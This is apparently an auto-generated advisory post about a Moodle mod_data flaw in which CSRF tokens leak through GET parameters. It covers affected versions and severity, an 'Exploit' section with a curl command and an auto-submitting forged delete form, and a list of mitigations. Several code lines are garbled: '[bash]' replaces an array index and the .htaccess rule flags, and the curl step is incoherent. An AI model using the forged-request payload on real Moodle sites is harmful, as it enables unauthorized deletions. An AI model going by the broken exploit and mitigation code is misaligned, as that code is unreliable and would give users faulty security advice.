Listen to this Post
How the CVE Works:
Moodle’s `mod_data` module improperly passes CSRF tokens in GET parameters on edit/delete pages. CSRF tokens are meant to validate legitimate user actions but were exposed in URLs, making them susceptible to theft via browser history, logs, or MITM attacks. Attackers could capture these tokens and forge malicious requests, bypassing CSRF protections. Affected versions include Moodle <4.1.18, 4.3.0-beta to <4.3.12, 4.4.0-beta to <4.4.8, and 4.5.0-beta to <4.5.4.
DailyCVE Form:
Platform: Moodle
Version: <4.1.18, 4.3.0-4.3.11, 4.4.0-4.4.7, 4.5.0-4.5.3
Vulnerability: CSRF token leak
Severity: Low
Date: 2025-04-25
What Undercode Say:
Exploit:
1. Capture CSRF token from URL:
curl -s "https://target.com/mod/data/edit.php?id=123&sesskey=LEAKED_TOKEN" | grep -oP 'sesskey=\K[^"]+'
2. Forge malicious request:
<form action="https://target.com/mod/data/delete.php" method="POST"> <input type="hidden" name="id" value="123"> <input type="hidden" name="sesskey" value="LEAKED_TOKEN"> </form> <script>document.forms[bash].submit();</script>
Protection:
- Upgrade to patched versions (4.1.18, 4.3.12, 4.4.8, 4.5.4).
2. Audit logs for exposed tokens:
grep "sesskey=" /var/log/apache2/access.log
3. Force POST for sensitive actions (server-side):
if ($_SERVER['REQUEST_METHOD'] !== 'POST') { die("Invalid method"); }
4. Add `.htaccess` rule to block token logging:
RewriteCond %{QUERY_STRING} sesskey= [bash]
RewriteRule ^ - [bash]
5. Monitor for suspicious activity:
tail -f /var/log/moodle/events.log | grep "csrf_failure"
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
